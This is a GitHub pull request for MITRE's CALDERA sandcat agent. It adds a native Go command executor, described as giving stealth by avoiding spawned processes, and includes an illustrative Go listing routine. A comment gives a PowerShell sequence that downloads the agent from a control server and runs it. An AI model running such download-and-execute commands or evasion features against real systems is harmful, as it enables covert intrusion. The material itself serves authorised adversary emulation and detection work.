mitre / sandcat

A CALDERA plugin
https://caldera.mitre.org/
Apache License 2.0

Native executor and basic ls method #388

Closed uruwhy closed 2 years ago

uruwhy commented 2 years ago

Description

Native executor for Sandcat agent - rather than rely on pre-existing executables or using psh/sh/cmd, create an extension that uses native golang functions to execute commands. The native executor will support a variety of commands, such as listing directories, listing processes, etc. This will provide added stealth by avoiding spawning unnecessary processes.

How Has This Been Tested?

Tested on Mac, Linux, and Windows - ran an agent with the native executor and ran a simple operation to list directories via native golang.

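As an added illustration of the native-executor idea from the PR description (not code from the sandcat repository), a minimal Go dispatcher with an in-process `ls` built on `os.ReadDir`; `commandTable`, `RunNative` and `nativeLs` are assumed names.

```go
package main

import (
	"fmt"
	"os"
	"strings"
)

// nativeCommand: arguments in, output text or error out, no child process.
type nativeCommand func(args []string) (string, error)

// commandTable is an assumed dispatch map, not the plugin's own registry.
var commandTable = map[string]nativeCommand{"ls": nativeLs}

// nativeLs lists a directory with os.ReadDir instead of spawning ls or dir.
// One entry per line, sorted by name, directories suffixed with "/".
func nativeLs(args []string) (string, error) {
	dir := "."
	if len(args) > 0 {
		dir = args[0]
	}
	entries, err := os.ReadDir(dir) // already sorted by filename
	if err != nil {
		return "", err // missing directory, permission denied, ...
	}
	lines := make([]string, 0, len(entries))
	for _, e := range entries {
		if e.IsDir() {
			lines = append(lines, e.Name()+"/")
		} else {
			lines = append(lines, e.Name())
		}
	}
	return strings.Join(lines, "\n"), nil
}

// RunNative splits a command line on whitespace and runs the matching native
// implementation in-process. Unknown commands are an error rather than being
// handed to a shell, so no process-creation event is ever generated.
func RunNative(cmdline string) (string, error) {
	fields := strings.Fields(cmdline)
	if len(fields) == 0 {
		return "", fmt.Errorf("empty command")
	}
	cmd, ok := commandTable[fields[0]]
	if !ok {
		return "", fmt.Errorf("no native implementation for %q", fields[0])
	}
	return cmd(fields[1:])
}
```

Because nothing is spawned, process-creation telemetry (Sysmon event ID 1, auditd execve records) shows only the agent process itself; file-access auditing scoped to that process is what would surface the listing.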
uruwhy commented 2 years ago

Had success when running a hand built sandcat agent, after copying in native files from gocat-extensions. However, I don't see a way to get it to include these when built through the server. @uruwhy Would native need to be added to the variation dict in sand_svc.py? Something like:

gocat_variants = dict(
    basic=set(),
    red=set(['gist', 'shared', 'shells', 'shellcode', 'native'])
)
default_gocat_variant = 'basic'

Ah, so when you want to compile an agent with a particular extension, you pass in the gocat-extensions HTTP header, and the corresponding header will have the extension name (e.g. native). If you want multiple extensions, you can pass in a comma-separated string as the HTTP header value. The sandcat plugin service will handle copying the required files, compiling the agent, and then removing the copied files for you.

E.g.

$url="http://192.168.137.1:8888/file/download"; 
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows"); 
$wc.Headers.add("file","sandcat.go"); 
$wc.Headers.add("gocat-extensions","native");  # this is where you specify the extension
$output="C:\Users\Public\sandcat.exe";
$wc.DownloadFile($url,$output); 
C:\Users\Public\sandcat.exe -server http://192.168.137.1:8888 -v;

sonarcloud[bot] commented 2 years ago

Kudos, SonarCloud Quality Gate passed!

Bug A 0 Bugs
Vulnerability A 0 Vulnerabilities
Security Hotspot A 0 Security Hotspots
Code Smell A 0 Code Smells

No Coverage information
0.0% Duplication